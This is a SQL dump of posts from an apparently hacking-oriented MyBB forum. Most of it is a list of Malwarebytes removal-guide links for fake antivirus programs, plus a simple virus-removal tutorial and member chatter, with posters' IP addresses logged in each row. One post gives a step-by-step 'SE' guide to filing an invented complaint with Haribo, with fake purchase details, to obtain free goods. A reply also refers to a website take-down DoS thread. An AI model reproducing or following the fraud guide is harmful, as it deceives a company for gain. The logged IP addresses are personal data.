2011[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=63655]Removal instructions for VaccineData[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=63585]Removal instructions for SuperVaccine[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=63413]Removal instructions for InfoHold[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=63297]Removal instructions for InternetVaccine[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=63234]Removal instructions for SP Center[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=63005]Removal instructions for KeyCop[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=62840]Removal instructions for KSecurity[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=62813]Removal instructions for Advanced Security Tool 2010[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=62612]Removal instructions for eClean[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=62507] Removal instructions for fake Microsoft Security Essentials alert[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=62221]Removal instructions for RealVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=62108]Removal instructions for Security119[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=61656]Removal instructions for Privacy Center[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=61583]Removal instructions for Privacy Info[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=61501]Removal instructions for MegaVaccine[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=61320]Removal instructions for WebVaccine[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=61147]Removal instructions for MedicCop[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=60979]Removal instructions for DiskClean[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=60740]Removal instructions for AdCare[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=60624]Removal instructions for VaccineTree[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=60486]Removal instructions for My Security Shield[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=60231]Removal instructions for VirusCure[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=60118]Removal instructions for GreenVaccine[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=60035]Removal instructions for EzPrivacy[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=59850]Removal instructions for Wireshark Antivirus[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=59595]Removal instructions for MyInfoGuard[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=59402]Removal instructions for PCPrivacy[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=59163]Removal instructions for ResetInfo[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=58828]Removal instructions for Antivirus 2010[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=58630]Removal instructions for Net Protector AntiVirus 2010[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=58621]Removal instructions for Anticare[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=57988] Removal instructions for Antivir Solution Pro[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=57637]Removal instructions for PrivacyCare[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=57624]Removal instructions for CleanVirus[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=57462]Removal instructions for ByeClean[/url] \r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=57011]Removal instructions for NeoProtect[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=56917] Removal instructions for Live Security Suite[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=56488] Removal instructions for DoctorV[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=56404] Removal instructions for Inprivacy[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=56368] Removal instructions for VDoctor[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=56294]Removal instructions for SafetyPC[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=56191]Removal instructions for ProtectInfo[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=55582] Removal instructions for Trojan Ransom.NoExe[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=55485] Removal instructions for XJR Antivirus[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=54634]Removal instructions for Defense Center[/url] \r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=54519] Removal instructions for PC Sweeper[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=54133]Removal instructions for Hardclean[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=53835]Removal instructions for Spycheck Anti-Spyware 2010[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=53741] Removal instructions for AV Security Suite[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=53410] Removal instructions for Your PC Protector[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=52821]Removal instructions for Sysinternals Antivirus[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=52607] Removal instructions for Spyware Cleaner 2010[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=52352]Removal instructions for Win Antispyware Center[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=51908] Removal instructions for Security Master AV[/url][*] [url=http://forums.malwarebytes.org/index.php?showtopic=51634] Removal instructions for VaccineCenter[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=51123]Removal instructions for ByteDefender[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=50996] Removal instructions for WinGuard[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=50775] Removal instructions for ACommander[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=50485] Removal instructions for PrivacyGuard[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=50483] Removal instructions for Smart Security[/url][*] [url=http://forums.malwarebytes.org/index.php?showtopic=50481] Removal instructions for Anti Virus Armor[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=46994] Removal instructions for Digital Protection[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=49893] Removal instructions for A-Fast Antivirus[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=49882] Removal instructions for AKM Antivirus 2010 Pro[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=49527]Removal instructions for Antispyware Soft[/url] \r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=49160] Removal instructions for My Security Engine[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=49053] Removal instructions for PCommander[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=48736] Removal instructions for VirusCatch[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=48537] Removal instructions for VirusBye[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=48193] Removal instructions for OneClean[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=48180] Removal instructions for FunnyMall[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=47641] Removal instructions for Spyware Cease[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=45798]Removal instructions for Security Central[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=45786] Removal instructions for Desktop Security 2010[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=45579] Removal instructions for Your Protection[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=45511]Removal instructions for Antivirus Suite[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=44882] Removal instructions for Control Components[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=44171] Removal instructions for Antimalware Doctor[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=44156] Removal instructions for PC Bug Finder Pro[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=44043] Removal instructions for Security Guard[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=44039] Removal instructions for User Protection[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=43987]Removal instructions for XP Internet Security[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=43142] Removal instructions for Antivirus7[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=42945]Removal instructions for CleanUp Antivirus[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=42915] Removal instructions for MyComGuard[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=42451] Removal instructions for Volcano Security Suite[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=42377]Removal instructions for Virus Protector[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=42074]Removal instructions for Dr. Guard[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=41803] Removal instructions for PrivacyControl[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=40952]Removal instructions for PC Defender[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=40935]Removal instructions for ErrorWiz[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=40802]Removal instructions for General Antivirus[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=40556]Removal instructions for Security essentials 2010[/url]\r\n[*] [url=http://forums.malwarebytes.org/index.php?showtopic=40241]Removal instructions for Paladin Antivirus[/url] \r\n [*] [url=http://forums.malwarebytes.org/index.php?showtopic=40153]Removal instructions for My Security Wall[/url] \r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=40021]Removal instructions for Security Antivirus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=39969]Removal instructions for Advanced Defender[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=39814]Removal instructions for Control center[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=39806]Removal instructions for Antivirus Plus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=39582]Removal instructions for AntiVir2010[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=39458]Removal instructions for GuardWWW[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=39312]Removal instructions for Antivirus Soft[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=38629]Removal instructions for XP Antispyware 2010[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=38352]Removal instructions for PcsSecure[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=38289]Removal instructions for Content Cleaner[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=37834]Removal instructions for Live PC Care[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=37542]Removal instructions for APcSafe[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=37206]Removal instructions for Win Security 360[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=36703]Removal instructions for Personal Security[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=36599]Removal instructions for DefendAPC[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=36445]Removal instructions for Ghost Antivirus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=36126]Removal instructions for AntiMalwarePro[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=35910]Removal instructions for InSysSecure[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=35836]Removal instructions for SysProtector[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=35407]Removal instructions for GreatDefender[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=35285]Removal instructions for Total PC Defender[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=35239]Removal instructions for Security Tool[/url]\r\n[/list][/list]\r\n\r\n [list][*][color=#00BFFF][b]2009 Self Help Guides[/b][/color]\r\n[list]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=34949]Removal instructions for Additional Guard[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=34889]Removal instructions for MalwareDefense[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=34664]Removal instructions for AntiMalware[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=34660]Removal instructions for APCProtect[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=34225]Removal instructions for Internet Security 2010[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=34126]Removal instructions for MalwareRemovalBot[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=34090]Removal instructions for TheDefend[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=33970]Removal instructions for Internet Antivirus Pro[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=16755]Removal instructions for WinBlueSoft[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=16740]Removal instructions for Unvirex[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=16522]Removal instructions for Advanced Virus Remover[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=14671]Removal instructions for AntiVirus360Remover[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=14628]Removal instructions for ErrorEasy[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=14567]Removal instructions for Advanced Spyware Detect[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=14468]Removal instructions for MalwareCleaner[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=14446]Removal instructions for ErrorFix[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=14444]Removal instructions for RegFix Pro[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=14443]Removal instructions for RegTool[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=14421]Removal instructions for Fix Tool[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=13964]Removal instructions for Virus Sweeper[/url]\r\n\r\n[/list]\r\n\r\n[*][color=#00BFFF][b]2008 Self Help Guides[/b][/color]\r\n[list]\r\n [*][url=http://forums.malwarebytes.org/index.php?showtopic=8412]Removal instructons for Antivirus 360[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4052]Removal instructions for Trojan.Zlob[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=7450]Removal instructions for VirusTrigger[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4064]Removal instructions for VideoAccessCodec[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=7314]Removal instructions for Spyware Guard 2008[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=7263]Removal instructions for WinDefender 2009[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=7262]Removal instructions for Personal Defender 2009[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=7123]Removal instructions for AntiVirus Sentry[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=6980]Removal instructions for Pro Antispyware 2009[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=6949]Removal instructions for Security 2009[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=6925]Removal instructions for SpyProtector[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=6881]Removal instructions for XLG Security Center[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=6703]Removal instructons for Antivirus 2010[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=6458]Removal instructions for AntiMalware 2009[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4556]Removal instructions for Spyware.Passwords[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=6305]Removal instructions for AntiVirus Lab 2009[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5786]Removal instructions for Antivir64[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5743]Removal instructions for WinProtector[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5742]Removal instructions for Internet Antivirus [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5398]Removal instructions for Trojan.DNSChanger[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5318]Removal instructions for The Web Sentinel[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5317]Removal instructions for The Registry Sentinel[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5252]Removal instructions for PC Clean Pro[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5251]Removal instructions for PC Antispy[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5178]Removal instructions for Antivirus 2009[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5177]Removal instructions for Doctor Antivirus 2008[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5176]Removal instructions for Real AntiSpyware[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5175]Removal instructions for WinAntispyware 2008[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5174]Removal instructions for SpywareScanner 2008[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5173]Removal instructions for PestSweeper[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5034]Removal instructions for Advanced Antivirus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=5033]Removal instructions for Trojan.FakeAlert[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4925]Removal instructions for AntiSpyCheck[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4782]Removal instructions for MalwarePatrolPro[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4781]Removal instructions for PCPrivacyCleaner[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4656]Removal instructions for AdvancedXPFixer[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4631]Removal instructions for Advanced XP Defender[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4630]Removal instructions for XP SecurityCenter[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4558]Removal instructions for Trojan.Agent[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4557]Removal instructions for Trojan.BHO[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4420]Removal instructions for IE AntiVirus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4280]Removal instructions for Malware Bell[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=4013]Removal instructions for Files Secure[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3900]Removal instructions for PCAntiVirusPro[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3865]Removal instructions for RealAV[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3804]Removal instructions for Spy-Rid[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3803]Removal instructions for Easy Spyware Cleaner[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3802]Removal instructions for InfeStop[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3787] Removal instructions for The LastDefender [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3786] Removal instructions for WinIFixer [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3766] Removal instructions for SpyWatchE [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3759] Removal instructions for SpySnipe [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3757] Removal instructions for OnlineGuard [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3652] Removal instructions for Antispyboss [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3651] Removal instructions for MalwareAlarm [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3620] Removal instructions for WinXDefender [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3619] Removal instructions for AdwareRemover 2007 [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3569] Removal instructions for SpyBurner [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3567] Removal instructions for SystemDefender [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3566] Removal instructions for SysCleaner [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3565] Removal instructions for WinReanimator [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3562] Removal instructions for WinFix Master [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3561] Removal instructions for Deus Cleaner 2008 [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3510] Removal instructions for XpAntivirus [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3505] Removal instructions for Immunizr [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3504] Removal instructions for WinSpyKiller [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3501] Removal instructions for AntiSpyKit [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3500] Removal instructions for MalwareCore [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=3493]Removal instructions for VirusHeat[/url]\r\n[/list][/list]\r\n\r\nCredits: Koala', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '46444985fefe80dae9b59bec4fa0ad54', '0', '0'); INSERT INTO mybb_posts VALUES('1657', '301', '1404', '25', 'RE: Is keyscrambler good?', '0', '9', 'p420', '1346971772', 'Keyscrambler is the best browser addon on the internet.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '8c343fba49ce230d62e612ee5b6aa1da', '0', '0'); INSERT INTO mybb_posts VALUES('1658', '355', '0', '25', '[TUT]Remove Win32:Sality virus and any other AV-blocking viruses', '0', '9', 'p420', '1346971856', 'I\'m infected recently with the win32:sality virus, and i successfully removed it. Here is my method:\n[list]\n1. Download a free antivirus([url=http://www.avast.com/free-antivirus-download]Click here if you don\'t have one[/url])\n2. Install it. If you can\'t install, follow the steps in the spoiler.\n[spoiler]\nFirst, try killing all auto-start apps like msmsgs.exe. If you still can\'t install your AV, follow these steps:\n[/spoiler]\n3. Run a virus scan.\n4. Delete all infected files.\n5. Now reboot your PC.\n6. If your antivirus running after restart, you sucessfully removed the virus.\nDon\'t forget to say thanks if i helped you!\nEnjoy your virus-free computer', '72.229.164.105', '1223009385', '0', '0', '9', '1346971981', '1', '493c21e58572279675231fcfdb52b30b', '0', '1346971981'); INSERT INTO mybb_posts VALUES('1659', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '9', 'p420', '1346972016', 'Unique sounds to be a group of HQ members would like to be in it.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '3fd41a0764ef766c948f81655951710e', '0', '0'); INSERT INTO mybb_posts VALUES('1660', '352', '1652', '12', 'RE: Linear Mode How to Take Down Websites Effectively + Proof', '0', '61', 'NXK', '1346972166', 'Seems legit. Please add a virus scan for your DoS tool.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '1f21a8ee753c94e5fa6c366c695cb3bf', '0', '0'); INSERT INTO mybb_posts VALUES('1661', '335', '1575', '25', 'RE: ESET NOD32 Antivirus & ESET Smart Security Username And Password 4 sept 2012', '0', '61', 'NXK', '1346972326', 'Moved your thread to the right section. \n\nThis is nice though. Hopefully people use these and get a bit of protection for their PCs.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '5913fbd0938f04d7a9c26e19bf46ef64', '0', '0'); INSERT INTO mybb_posts VALUES('1662', '349', '1648', '33', 'RE: Everyone Read', '0', '9', 'p420', '1346972495', 'Thanks for the info. I thought you were making an announcement', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '9f053e876d7654201cb0cb3b95b1a32f', '0', '0'); INSERT INTO mybb_posts VALUES('1663', '321', '1502', '34', 'RE: Full Signature Tutorial', '0', '9', 'p420', '1346972548', 'Nice tutorial. This section is full of tutorials.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'bc375f000db37750447a6454134ee96d', '0', '0'); INSERT INTO mybb_posts VALUES('1664', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1346973077', 'Banned for having a Skype ID', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'a71980db6b85d22fe337f5e69e8a02a0', '0', '0'); INSERT INTO mybb_posts VALUES('1665', '238', '1664', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346973398', '[quote=\'t3h jok3r\' pid=\'1664\' dateline=\'1346973077\']\r\nBanned for having a Skype ID\r\n[/quote]\r\n\r\nBanned for having numbers in Username.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd0ac0fd11f4a3aba722620aeec6d0d29', '0', '0'); INSERT INTO mybb_posts VALUES('1666', '349', '1662', '33', 'RE: Everyone Read', '0', '82', 'iTzIpod', '1346973648', '[quote=\'p420\' pid=\'1662\' dateline=\'1346972495\']\r\nThanks for the info. I thought you were making an announcement\r\n[/quote]\r\n\r\n:p Sorry for the mix up? Umm. I\'ve seen you a while on the forum. You weren\'t that quite active :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '84440ab283311a3fc8712c4c6a1db41d', '0', '0'); INSERT INTO mybb_posts VALUES('1667', '321', '1663', '34', 'RE: Full Signature Tutorial', '0', '82', 'iTzIpod', '1346973724', '[quote=\'p420\' pid=\'1663\' dateline=\'1346972548\']\r\nNice tutorial. This section is full of tutorials.\r\n[/quote]\r\n\r\nThat\'s why it is the Tutorial and Guides section?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d21434763f2800369e045b3c3802c1f', '0', '0'); INSERT INTO mybb_posts VALUES('1668', '212', '1659', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1346974675', '[quote=\'p420\' pid=\'1659\' dateline=\'1346972016\']\nUnique sounds to be a group of HQ members would like to be in it.\n[/quote]\n\nI saw you a while on LH. But you weren\'t as active before. \n\nBut you were very HQ.\n\nHope to see you in the future. HQ as usual.', '24.212.197.164', '416597412', '1', '0', '82', '1346974699', '1', '424a93ea2e2577167e01ca66c3390bcf', '0', '1346974699'); INSERT INTO mybb_posts VALUES('1669', '356', '0', '16', 'Haribo - SE', '0', '112', '??????Z', '1346978831', 'So i have recently been learning to SE and from some previous ones i have tried i took it upon myself to try find companies to SE myself and i found Haribo to be successful. What you get from them depends on what you want.\r\n\r\nStep 1: goto this Link\r\nfor GB users: http://www2.haribo.com/enGB/contact-information-service/contact-information-how-to-find-us.html\r\n\r\nFor USA: http://www.haribo.com/planet/us/info/contact.php (Then Click Email Us)\r\n\r\nStep 2: (For GB Method) \r\nClick the drop down list and select \"Complaints\"\r\nThen fill out all your correct information, select the brand of the candy that you want and type in the name of the product you want.\r\n\r\nThen fill out the town in which you \"bought\" the candy from and what store (use a well known one, i used Morrisons which is a popular UK store)\r\n \r\nLeave \"Batch Number\" empty and also leave \"Packing Time\" and \"Packaging Size\" Empty.\r\n\r\nFor the \"Best Before Date\" use something believe able like sometime in the next 2 years. \r\n\r\nYou dont need to upload any pictures although it asked for some. \r\nand for the message type something like this: Hello, Firstly id like to say haribo is an amazing company, Secondly no so much good news. i recently purchased 2 bags of \"your choice of candy\" and the candy was hard and tasted wrong so i threw the candy away. I was wondering is there anything you can do about this? Thanks\r\n\r\nStep 2 for USA users:\r\nFill out the form with your correct information and in the text box put a complaint like the example above.\r\n\r\nA day after i sent my complaint i received this email..\r\n\r\n[spoiler]Dear Mr Kendall\r\n\r\nThank you for your email regarding Haribo Strawbs. \r\n\r\nWe are sorry that in this instance the product you purchased was found to be unsatisfactory. \r\n\r\nUnfortunately, without a sample of the product together with the relevant packaging codes we are unable to conduct a full investigation into the source of any problem but we will pass your comments in respect of the product to our marketing department.\r\n\r\nWe ask you to accept our sincere apologies for the trouble and inconvenience you have been caused.\r\n\r\n[color=red]A sample of goodwill has been posted and you should receive this within the next ten days.[/color]\r\n\r\n-- \r\nRegards\r\n\r\nMichael Carr\r\nHaribo Customer Care (UK)[/spoiler]\r\n\r\n\r\n\r\nIm still waiting for mine to arrive as i only did this yesterday but i will let you all know how much candy they send me. \r\n\r\nhave fun and please vouce and +rep if this helped you out. If you need any help then feel free to pm me or post here.', '92.22.251.182', '1545010102', '0', '0', '112', '1346979807', '1', 'f96cb3fb8321b721b295ab7a316a298b', '0', '1346979807'); INSERT INTO mybb_posts VALUES('1670', '357', '0', '3', '[Bug] Can\'t Rep?', '0', '82', 'iTzIpod', '1346979495', 'I\'m not sure if it is only affecting me. Since I\'m on Mobile. But when I try to rep someone, I get an error saying : .... I forgot. It said Remote Server or something and file not found?\r\n\r\nNot sure if bug. But I\'ll put it as that.\r\n\r\n\r\nAlthough I\'m pretty sure t3h jok3r knows the reason why this error occurs.\r\n\r\nGuessing because of 